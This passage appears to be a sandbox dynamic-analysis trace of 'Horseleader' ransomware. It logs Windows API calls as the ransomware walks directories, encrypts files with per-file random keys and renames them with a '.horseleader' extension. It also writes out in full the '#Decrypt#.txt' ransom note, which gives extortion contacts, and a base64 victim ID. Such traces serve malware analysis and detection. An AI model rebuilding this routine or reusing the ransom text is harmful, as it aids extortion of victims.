dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.756] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 101 [0244.756] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.756] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=16683) returned 1 [0244.756] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x412b, lpOverlapped=0x0) returned 1 [0244.759] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffbed5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.759] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x412b, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x412b, lpOverlapped=0x0) returned 1 [0244.760] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.760] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.760] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.760] CloseHandle (hObject=0x15c) returned 1 [0244.760] GetProcessHeap () returned 0x780000 [0244.760] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.760] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML.horseleader") returned 113 [0244.761] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml.horseleader")) returned 1 [0244.761] GetProcessHeap () returned 0x780000 [0244.761] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.762] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c227b0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xbec48620, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c227b0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x412b, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.762] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.762] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\#Decrypt#.txt") returned 105 [0244.762] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.765] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0244.765] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.766] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0244.766] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.767] CloseHandle (hObject=0x1a4) returned 1 [0244.767] GetProcessHeap () returned 0x780000 [0244.767] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.767] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf551ba0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xaf577d00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaf577d00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Project.en-us", cAlternateFileName="PROJEC~1.EN-")) returned 1 [0244.767] lstrcmpiW (lpString1="Project.en-us", lpString2="Windows") returned -1 [0244.767] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us") returned 97 [0244.767] lstrcmpW (lpString1="Project.en-us", lpString2=".") returned 1 [0244.767] lstrcmpW (lpString1="Project.en-us", lpString2="..") returned 1 [0244.767] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.767] GetProcessHeap () returned 0x780000 [0244.767] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.768] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\*") returned 99 [0244.768] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf551ba0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xaf577d00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaf577d00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.769] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.769] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\.") returned 99 [0244.769] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.769] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf551ba0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xaf577d00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaf577d00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="..", cAlternateFileName="")) returned 1 [0244.769] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.769] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\..") returned 100 [0244.770] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.770] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.770] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5b2ebe0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xaf551ba0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5b2ebe0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="ProjectMUI.XML", cAlternateFileName="PROJEC~1.XML")) returned 1 [0244.770] lstrcmpiW (lpString1="ProjectMUI.XML", lpString2="Windows") returned -1 [0244.770] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 112 [0244.770] StrStrIW (lpFirst="ProjectMUI.XML", lpSrch=".horseleader") returned 0x0 [0244.770] lstrcmpW (lpString1="ProjectMUI.XML", lpString2="#Decrypt#.txt") returned 1 [0244.770] lstrcmpW (lpString1="ProjectMUI.XML", lpString2="_uninstalling_.png") returned 1 [0244.770] lstrlenW (lpString=".testttjffg") returned 11 [0244.770] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML", lpSrch=".testttjffg") returned 0x0 [0244.770] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.770] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.771] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.771] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 112 [0244.771] StrStrW (lpFirst="ProjectMUI.XML", lpSrch=".txt") returned 0x0 [0244.771] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1452) returned 1 [0244.772] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5ac, lpOverlapped=0x0) returned 1 [0244.773] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffa54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.774] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5ac, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5ac, lpOverlapped=0x0) returned 1 [0244.774] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.774] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.775] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.775] CloseHandle (hObject=0x15c) returned 1 [0244.775] GetProcessHeap () returned 0x780000 [0244.775] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.775] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML.horseleader") returned 124 [0244.775] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml.horseleader")) returned 1 [0244.776] GetProcessHeap () returned 0x780000 [0244.776] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.777] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5bc88d0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xaf577d00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc88d0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x750, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.777] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.777] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 107 [0244.777] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.777] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.777] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.777] lstrlenW (lpString=".testttjffg") returned 11 [0244.777] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.777] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.777] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.777] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.778] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 107 [0244.778] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.778] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1872) returned 1 [0244.778] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x750, lpOverlapped=0x0) returned 1 [0244.781] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff8b0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.781] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x750, lpOverlapped=0x0) returned 1 [0244.784] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.784] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.784] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.784] CloseHandle (hObject=0x15c) returned 1 [0244.785] GetProcessHeap () returned 0x780000 [0244.785] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0244.785] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML.horseleader") returned 119 [0244.785] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\setup.xml.horseleader")) returned 1 [0244.786] GetProcessHeap () returned 0x780000 [0244.786] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0244.786] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5bc88d0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xaf577d00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc88d0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x750, dwReserved0=0x900dc3b1, dwReserved1=0x8792a3f5, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.786] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.786] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\#Decrypt#.txt") returned 111 [0244.787] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.792] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0244.792] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.794] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5i